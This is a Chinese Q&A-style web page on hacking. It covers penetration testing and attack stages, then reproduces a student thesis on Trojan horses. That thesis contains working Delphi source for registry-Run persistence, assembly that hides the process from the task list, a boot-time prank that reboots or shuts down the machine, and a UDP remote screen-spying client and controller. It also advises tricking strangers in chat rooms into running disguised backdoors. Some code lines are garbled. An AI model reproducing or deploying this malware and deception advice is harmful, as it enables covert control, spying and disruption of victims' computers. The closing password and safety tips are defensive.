本文目录一览：

• 1、网站渗透测试服务公司怎么选择，什么是渗透测试

• 2、黑客攻击的三个阶段是什么？黑客在这三个阶段分别完成什么工作？

• 3、电脑 *** 中的“后门”是什么意思？

网站渗透测试服务公司怎么选择，什么是渗透测试

网站渗透测试其实就是模拟黑客恶意攻击你的网站，找出一的网站漏洞，从而进行安全防御和维护的一种测试

再简单说，就是找网站bug

至于公司怎么选择，说实话，目前国内并没有什么特别牛特别专业的网站渗透测试公司，有一些黑客大拿技术很牛，但是都是比较小的圈子里面，这种人一般不会抛头露面，能不能找到看你资源和能力咯

另外，如果你的网站根本不是特别重要，特别秘密，只是一般的组织网站，企业网站，个人网站，根本用不着这种测试，黑客没空黑你的网站的！

黑客攻击的三个阶段是什么？黑客在这三个阶段分别完成什么工作？

1. 锁定目标

攻击的之一步就是要确定目标的位置，在互联网上，就是要知道这台主机的域名或者IP地址, 知道了要攻击目标的位置还不够，还需要了解系统类型、操作系统、所提供的服务等全面的资料，如何获取相关信息，下面我们将详细介绍。

2. 信息收集

如何才能了解到目标的系统类型、操作系统、提供的服务等全面的资料呢?黑客一般会利用下列的公开协议或工具来收集目标的相关信息。

(1)SNMP 协议：用来查阅 *** 系统路由器的路由表，从而了解目标主机所在 *** 的拓扑结构及其内部细节;

(2)TraceRoute程序：用该程序获得到达目标主机所要经过的 *** 数和路由器数;

(3)Whois协议：该协议的服务信息能提供所有有关的DNS域和相关的管理参数;

(4)DNS服务器：该服务器提供了系统中可以访问的主机的IP地址表和它们所对应的主机名;

(5)Finger协议：用来获取一个指定主机上的所有用户的详细信息(如注册名、 *** 号码、最后注册时间以及他们有没有读邮件等等);

(6)ping：可以用来确定一个指定的主机的位置;

(7)自动Wardialing软件：可以向目标站点一次连续拨出大批 *** 号码，直到遇到某一正确的号码使其MODEM响应为止。

3. 系统分析

当一个黑客锁定目标之后，黑客就开始扫描分析系统的安全弱点了。黑客一般可能使用下列方式来自动扫描驻留在 *** 上的主机。

(1)自编入侵程序

对于某些产品或者系统，已经发现了一些安全漏洞，该产品或系统的厂商或组织会提供一些“补丁”程序来进行弥补。但是有些系统常常没有及时打补丁，当黑客发现这些“补丁”程序的接口后就会自己编写能够从接口入侵的程序，通过这个接口进入目标系统，这时系统对于黑客来讲就变得一览无余了。

(2)利用公开的工具

像 Internet 的电子安全扫描程序 ISS(Intemet Security Scanner)、审计 *** 用的安全分析工具 SATAN ( Securi Ana1ysis Tool for Auditing Network)等。这些工具可以对整个 *** 或子网进行扫描，寻找安全漏洞。这些工具都有两面性，就看是什么人在使用它们了。系统管理员可以使用它们来帮助发现其管理的 *** 系统内部隐藏的安全漏洞，从而确定系统中哪些主机需要用“补丁”程序去堵塞漏洞，从而提高 *** 的安全性能。而如果被黑客所利用，则可能通过它们来收集目标系统的信息，发现漏洞后进行入侵并可能获取目标系统的非法访问权。

4. 发动攻击

完成了对目标的扫描和分析，找到系统的安全弱点或漏洞后，那就是万事具备，只欠攻击了，接下来是黑客们要做的关键步骤——发动攻击。

黑客一旦获得了对你的系统的访问权后，可能有下述多种选择：

(1)试图毁掉攻击入侵的痕迹，并在受到损害的系统上建立另外的新的安全漏洞或后门，以便在先前的攻击点被发现之后，继续访问这个系统;

(2)在你的系统中安装探测软件，包括木马等，用以掌握你的一切活动，以收集他比较感兴趣的东西(不要以为人人都想偷窥你的信件，人家更感兴趣的是你的电子银行帐号和密码之类);

(3)如果你是在一个局域网中，黑客就可能会利用你的电脑作为对整个 *** 展开攻击的大本营，这时你不仅是受害者，而且还会成为帮凶和替罪羊。

黑客是一个中文词语，皆源自英文hacker，随着灰鸽子的出现，灰鸽子成为了很多假借黑客名义控制他人电脑的黑客技术，于是出现了“骇客”与"黑客"分家。2012年电影频道节目中心出品的电影《骇客（Hacker) 》也已经开始使用骇客一词，显示出中文使用习惯的趋同。实际上，黑客（或骇客）与英文原文Hacker、Cracker等含义不能够达到完全对译，这是中英文语言词汇各自发展中形成的差异。Hacker一词，最初曾指热心于计算机技术、水平高超的电脑专家，尤其是程序设计人员，逐渐区分为白帽、灰帽、黑帽等，其中黑帽（black hat）实际就是cracker。在媒体报道中，黑客一词常指那些软件骇客（software cracker），而与黑客（黑帽子）相对的则是白帽子。

电脑 *** 中的“后门”是什么意思？

电脑 *** 中的“后门”即是 *** 的漏洞

一、问题的提出

"The Internet is now more like an unlocked diary,with millions of consumers divulging marketable details of their personal lives,from where they live to what they eat for dinner."这是著名匿名服务器站点Anonymizer上曾有过的一段话。是的，在不知不觉中，E时代已经到来， *** 给我们的生活增添了绚丽与多彩。但是，在这五彩缤纷的世界下面，潜伏着一股黑潮暗流--黑客（HACKER）。这个名词越来越引起世人的关注，而且影响越来越大，关于黑客事件的报道也越来越多。黑客是伴随 *** 产生成长的，是指那些对电脑和 *** 有狂热兴趣的人，他们不断的研究电脑和 *** 知识，发现电脑和 *** 中的漏洞，喜欢挑战高难度的 *** 系统，千方百计的寻找 *** 中的大小漏洞，然后向 *** 管理员提出解决漏洞的建议。真正的黑客大多是赋有正义感的。他们不会恶意侵入他人系统，并且破坏系统程序和数据。但有一些人特别崇拜黑客，喜欢利用电脑 *** 四处捣乱，到处寻找黑客软件，然后到处搞破坏，这类人应该是 *** 上最危险的家伙。现在的媒体把这类人是黑客混为一谈，"黑客"一词也因此成了贬义词。

现在的黑客软件十分多，Back Orific、冰河、YAI到处都有。接触 *** 后，我经常想：黑客软件到底是如何编制的？我能编一个黑客软件多好呀！这到不是想干坏事，因为在 *** 机房上课时，用一些黑客软件可以作为控制工具来控制学员的机器（如：冰河）。可见黑客软件本身不象病毒是个不好的东西，是可以用在正路上的。经过我的摸索，初步掌握了一些设计 *** ，主要是特洛伊木马程序。本次毕业设计，我设计一个模拟黑客入侵程序，一个恶作剧程序，一个可以截获 *** 上别人在机器上干些什么的程序，几个程序纯属用于实验，没有什么其它目的。在这里向各位老师汇报一下。程序设计的语言用的是PASCAL，用DELPHI 4进行编译。

二、"特洛伊木马"如何入侵系统

一个完整的"特洛伊木马"一般分为两个部分：一个是客户服务程序（Client），用它来控制已经打开"后门"的机器；另一个是"后门"程序，用它来开放某台机器。假设我们想控制某台电脑，那么我们通过一些手段来把"后门"程序传到该电脑中并使其运行，这样该电脑就变成了一台特殊的FTP服务器。然后我们使用Client程序就可以控制该电脑了。当然，后门程序如果不运行也就无法发挥作用。因此，就要"诱骗"别人使用后门程序。如果是朋友或熟人，利用他们的信任让他运行就行了；要是陌生人，可以在聊天室中和他们套近乎，一旦取得信任，把程序发给他们，诱骗其运行。当然，程序要隐蔽一些，例如可以把后门程序改名，变为README之类，或改变后缀，变成GIF、BMP等，当他们双击这些文件后就上了"贼船"了。也可以用WINZIP的把后门程序和一些东西 *** 成一个自解压包，然后利用设定解压后自动运行SETUP程序功能来运行指定的后门程序。总之，要利用一切手段使人家运行后门程序。

木马程序运行后，会通过不同的方式修改系统，以便以后启动系统后自动运行木马。修改 *** 一般是通过修改注册表：

Hkey_local_machine \Software\Microsoft\Windows\CurrentVersion\Run和

Hkey_local_machine\Software\Microsoft\Windows\CurrentVersion\RunServices中的项目是在系统开机时自动加载的，我们可以在这两添加键值，达到自动启动的目的。以下的这段代码可以修改注册表，并调用API函数判断系统目录，复制文件到其下，以实行入侵系统的目的：

unit Unit1;

interface

uses

Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,

StdCtrls,registry;

type

TForm1 = class(TForm)

Button1: TButton;

Button2: TButton;

procedure Button1Click(Sender: TObject);

procedure Button2Click(Sender: TObject);

private

{ Private declarations }

public

{ Public declarations }

end;

var

Form1: TForm1;

implementation

{$R *.DFM}

procedure TForm1.Button1Click(Sender: TObject);

var

regf:tregistry;

sysdir:pchar;

temp:string;

begin

getmem(sysdir,256);

getsystemdirectory(sysdir,128);

temp:=sysdir+'\client.exe';

freemem(sysdir,256);

regf:=tregistry.create;

regf.rootkey:=hkey_local_machine;

regf.openkey('software\microsoft\windows\currentversion\run',true);

regf.writestring(' ',temp);

regf.free;

copyfile(pchar('hacker.exe'),pchar(temp),true);

end;

procedure TForm1.Button2Click(Sender: TObject);

begin

close;

end;

end.

也有些高明的程序可以感染系统文件，附着在这些程序文件中，以达到其目的。我还没有搞清楚这是怎样办到的。

在Windows中按下Ctrl+Alt+Del可以显示当前运行的程序，这样一来，我们的木马程序不是要露馅了吗？以下这段汇编代码可以很方便的嵌入DELPHI或C++中，让别人看不到你的程序，可以很好的隐藏：

a ***

mov ebx,30h

push es

push fs

pop es

mov ebx,es:[ebx]

pop es

mov eax,10800000h

xchg [ebx+20h],eax

end;

为什么这段汇编代码可以隐藏程序呢？据资料分析：在WINDOWS 9X加载应用程序时，FS指向的段就是类似于DOS应用程序的PSP，里面保存着一些有关应用程序重要数据，按下Ctrl+Alt+Del后，对于一个应用程序，若没有可显示的ENABLE窗口的名字，则系统要检查上面程序段中的特定双字是不是10800000h，如果是就不显示这个应用程序的可执行文件的名字。

下面是一个恶作剧的程序，入侵计算机后，每次开机后，随机出现鼠标乱跑并发出怪叫、热启动、强行关机的现象，让你无法进入WINDOWS 9X。对于一般的计算机用户来说，因为找不出这个程序在何处，所以只能格式化系统区，重新安装系统。

program hacker;

uses

windows;

var temp:integer;

begin

a ***

mov ebx,30h

push es

push fs

pop es

mov ebx,es:[ebx]

pop es

mov eax,10800000h

xchg [ebx+20h],eax

end;

randomize;

temp:=random(3);

if temp=0 then

while(true) do

begin

messagebeep(0);

SetCursorPos (random(640),random(480));

end

else if temp=1 then

ExitWindowsEx(EWX_REBOOT,0)

else ExitWindowsEx(EWX_SHUTDOWN,0);

end.

有的木马为了防止发现后被清除，在启动时会产生一个备份，一般是感染WINDOWS的系统文件，当木马被发现并清除后，备份会自动激活，使你依然处于远程黑手的控制。比如当前国最盛行的"冰河"，首先会修改注册表的启动项目，将自己复制两份到系统中，分别为KERNEL32.EXE和SYSEXPLE.EXE，并且修改TXT文件的打开方式，一旦KERNEL32.EXE被删除，那么当打开一个TXT文件时，SYSEXPLE.EXE将再产生一个KERNEL32.EXE文件。

另外，有的木马还能在运行后修改文件名，或者复制感染系统后，进行自我销毁，使用户很难进行查找。

三、木马的种类

1、破坏型

惟一的功能就是破坏并且删除文件，可以自动的删除电脑上的DLL、INI、EXE文件。

2、密码发送型

可以找到隐藏密码并把它们发送到指定的信箱。有人喜欢把自己的各种密码以文件的形式存放在计算机中，认为这样方便；还有人喜欢用WINDOWS提供的密码记忆功能，这样就可以不必每次都输入密码了。许多黑客软件可以寻找到这些文件，把它们送到黑客手中。也有些黑客软件长期潜伏，记录操作者的键盘操作，从中寻找有用的密码。

在这里提醒一下，不要认为自己在文档中加了密码而把重要的保密文件存在公用计算机中，那你就大错特错了。别有用心的人完全可以用穷举法暴力破译你的密码。利用WINDOWS API函数EnumWindows和EnumChildWindows对当前运行的所有程序的所有窗口（包括控件）进行遍历，通过窗口标题查找密码输入和出确认重新输入窗口，通过按钮标题查找我们应该单击的按钮，通过ES_PASSWORD查找我们需要键入的密码窗口。向密码输入窗口发送WM_SETTEXT消息模拟输入密码，向按钮窗口发送WM_COMMAND消息模拟单击。在破解过程中，把密码保存在一个文件中，以便在下一个序列的密码再次进行穷举或多部机器同时进行分工穷举，直到找到密码为止。此类程序在黑客网站上唾手可得，精通程序设计的人，完全可以自编一个。

3、远程访问型

最广泛的是特洛伊马，只需有人运行了服务端程序，如果客户知道了服务端的IP地址，就可以实现远程控制。以下的程序可以实现观察"受害者"正在干什么，当然这个程序完全可以用在正道上的，比如监视学生机的操作。

程序中用的UDP（User Datagram Protocol，用户报文协议）是因特网上广泛采用的通信协议之一。与TCP协议不同，它是一种非连接的传输协议，没有确认机制，可靠性不如TCP，但它的效率却比TCP高，用于远程屏幕监视还是比较适合的。它不区分服务器端和客户端，只区分发送端和接收端，编程上较为简单，故选用了UDP协议。本程序中用了DELPHI提供的TNMUDP控件。

受控机程序部分：

让控件CUDP监视受控机的1111端口，当有数据发送到该口时，触发控件CUDP的ONDATARECEIVED事件；REMOTEPORT属性设为2222，当控件CUDP发送数据时，将数据发送到主控机的2222口。

unit Unit1;

interface

uses

Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,

NMUDP, ComCtrls;

type

Tclient = class(TForm)

cudp: TNMUDP;

Animate1: TAnimate;

procedure FormCreate(Sender: TObject);

procedure FormDestroy(Sender: TObject);

procedure cudpDataReceived(Sender: TComponent; NumberBytes: Integer;

FromIP: String);

private

{ Private declarations }

public

{ Public declarations }

end;

var

client: Tclient;

implementation

const bufsize=2048;//发送每一批数据的缓冲区大小

var

bmpstream:tmemorystream;

leftsize:longint;

{$R *.DFM}

procedure screencap(leftpos,toppos,rightpos,bottompos:integer);

var

recwidth,recheight:integer;

sourcedc,destdc,bhandle:integer;

bitmap:Tbitmap;

begin

recwidth:=rightpos-leftpos;

recheight:=bottompos-toppos;

sourcedc:=createdc('display','','',nil);

destdc:=createcompatibledc(sourcedc);

bhandle:=createcompatiblebitmap(sourcedc,recwidth,recheight);

selectobject(destdc,bhandle);

bitblt(destdc,0,0,recwidth,recheight,sourcedc,leftpos,toppos,srccopy);

bitmap:=tbitmap.Create;

bitmap.Handle:=bhandle;

bitmap.SaveToStream(bmpstream);

bmpstream.Position:=0;

leftsize:=bmpstream.Size;

bitmap.Free;

deletedc(destdc);

releasedc(bhandle,sourcedc);

end;

procedure Tclient.FormCreate(Sender: TObject);

begin

bmpstream:=tmemorystream.create;

end;

procedure Tclient.FormDestroy(Sender: TObject);

begin

bmpstream.free;

end;

procedure Tclient.cudpDataReceived(Sender: TComponent;

NumberBytes: Integer; FromIP: String);

var

ctrlcode:array[0..29] of char;

buf:array[0..bufsize-1] of char;

tmpstr:string;

sendsize,leftpos,toppos,rightpos,bottompos:integer;

begin

cudp.ReadBuffer(ctrlcode,numberbytes);//读取控制码

if ctrlcode[0]+ctrlcode[1]+ctrlcode[2]+ctrlcode[3]='show'

then

begin//控制码前4位为"SHOW"表示主控机发出了截屏指令

if bmpstream.Size=0 then//没有数据可发，必须截屏生成数据

begin tmpstr:=strpas(ctrlcode);

tmpstr:=copy(tmpstr,5,length(tmpstr)-4);

leftpos:=strtoint(copy(tmpstr,1,pos(':',tmpstr)-1));

tmpstr:=copy(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr));

toppos:=strtoint(copy(tmpstr,1,pos(':',tmpstr)-1));

tmpstr:=copy(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr));

rightpos:=strtoint(copy(tmpstr,1,pos(':',tmpstr)-1));

bottompos:=strtoint(copy(tmpstr,pos(':',tmpstr)+1,length(tmpstr)-pos(':',tmpstr)));

screencap(leftpos,toppos,rightpos,bottompos);//调用截屏函数

end;

if leftsizebufsize then sendsize:=bufsize

else sendsize:=leftsize;

bmpstream.ReadBuffer(buf,sendsize);

leftsize:=leftsize-sendsize;

if leftsize=0 then bmpstream.Clear;

cudp.RemoteHost:=fromip;//FROMIP为主控机IP地址

cudp.SendBuffer(buf,sendsize);//将数据发到主控机的2222端口

end;

end;

end.

主控机程序部分：

让控件SUDP监视主控机的2222端口，当有数据发送到该口时，触发SUDP的ONDATARECEIVED事件；REMOTEPORT属性设为1111，当控件SUDP发送数据时，将数据发到受控机的1111口。

unit Unit1;

interface

uses

Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,

ExtCtrls, StdCtrls, Buttons, NMUDP;

type

Tsever = class(TForm)

Edit1: TEdit;

Edit2: TEdit;

Label1: TLabel;

Label2: TLabel;

BitBtn1: TBitBtn;

Image1: TImage;

BitBtn2: TBitBtn;

sudp: TNMUDP;

procedure BitBtn2Click(Sender: TObject);

procedure FormCreate(Sender: TObject);

procedure FormDestroy(Sender: TObject);

procedure BitBtn1Click(Sender: TObject);

procedure sudpDataReceived(Sender: TComponent; NumberBytes: Integer;

FromIP: String);

private

{ Private declarations }

public

{ Public declarations }

end;

var

sever: Tsever;

implementation

const bufsize=2048;

var

rsltstream,tmpstream:tmemorystream;

{$R *.DFM}

procedure Tsever.BitBtn2Click(Sender: TObject);

begin

close;

end;

procedure Tsever.FormCreate(Sender: TObject);

begin

rsltstream:=tmemorystream.create;

tmpstream:=tmemorystream.create;

end;

procedure Tsever.FormDestroy(Sender: TObject);

begin

rsltstream.free;

tmpstream.free;

end;

procedure Tsever.BitBtn1Click(Sender: TObject);

var

reqcode:array[0..29] of char;

reqcodestr:string;

begin

reqcodestr:='show'+edit1.text;

strpcopy(reqcode,reqcodestr);

tmpstream.Clear;

rsltstream.Clear;

sudp.RemoteHost:=edit2.Text;

sudp.SendBuffer(reqcode,30);

end;

procedure Tsever.sudpDataReceived(Sender: TComponent; NumberBytes: Integer;

FromIP: String);

var reqcode:array[0..29] of char;

reqcodestr:string;

begin

reqcodestr:='show'+edit1.text;

strpcopy(reqcode,reqcodestr);

sudp.ReadStream(tmpstream);

rsltstream.CopyFrom(tmpstream,numberbytes);

if numberbyte *** ufsize then

begin

rsltstream.Position:=0;

image1.Picture.Bitmap.LoadFromStream(rsltstream);

tmpstream.Clear;

rsltstream.Clear;

end

else

begin

tmpstream.Clear;

reqcode:='show';

sudp.RemoteHost:=edit2.Text;

sudp.SendBuffer(reqcode,30);

end;

end;

end.

四、如何预防黑客

黑客程序虽然破坏大，但不是不能防止的。

1、处理好你的密码

我们一般是用账号和密码来上网的，密码的设置无疑是十分讲求技巧的，许多人的安全防范意识差，不注意密码的设置，造成自己的账号被盗用。如今的黑客软件都是挂上密码字典，然后用穷举法进行破解，密码太简单，那么破解的可能性就大了。以下是一些注意事项。

⑴ 密码不可和账号相同，这是最容易被猜到的了。

⑵ 经常更改密码，拿到新账号后要立即更改密码，不要放久了。

⑶ 密码更好多于8个字符，字符越长，破解难度越大。例如WORD文档的密码大于8位后，目前的破解软件几乎无法攻破。另外，更好在密码中加入一些控制键，增加破译难度。千万不可用单一的字母或数字。

⑷ 有人喜欢用自己的生日、 *** 、身份证号码等作为密码，你不要这样做。

⑸ 密码尽量不要记显眼的纸张上，更不能保存在计算机中，不要贪图一时方便，用WINDOWS提供的保存密码功能。

2、不要运行不明真相的程序

无论都高明的黑客程序，只要你不去运行它，就无法害到你。所以，不可相信网友的话，不要去运行他提供的程序；不要随意去打开别人寄来的附件，无论他把附件中的图片或影片吹得如何好看；要到大的、著名的网站去下载软件，千万不要到不明真象的个人网页下载，因为在那儿你可能下载的病毒和黑客之手；如果你十分羡慕黑客，也请你不要下载所谓的黑客软件，否则你没害到别人，自己反被害了；如果你的机器上有防火墙，在上网时一定要打开，不要怕麻烦。

3、经常检查系统信息

上网过程中，突然觉得计算机工作不对劲时，仿佛感觉有人在遥远的地方遥控你。这时，你必须及时停止手中工作，运行"附件→系统工具→系统信息"，在任务列表中寻找自己不熟悉的或者自己并没有运行的程序，一旦找到程序后应立即终止它的运行，以防后患。

4、更好不去聊天室

我一直认为聊天室没有什么意思，特别对于计算机专业人员，聊天只是浪费时间和金钱，有些恶意的破坏者利用网上聊天室的漏洞干坏事，例如聊天室支持JAVA、HTML等功能，然而，这小小的JAVA也隐藏"杀机"，他可以发给你一个足以让你的机器当机的HTML语句。因为这些语句是不会在聊天室显示出来的，所以你被暗算了可能还不知道。防治的办法是在你的浏览器中关闭你的JAVA脚本。想聊天的，在公共机房聊聊算了，不能在自己的机器上聊天。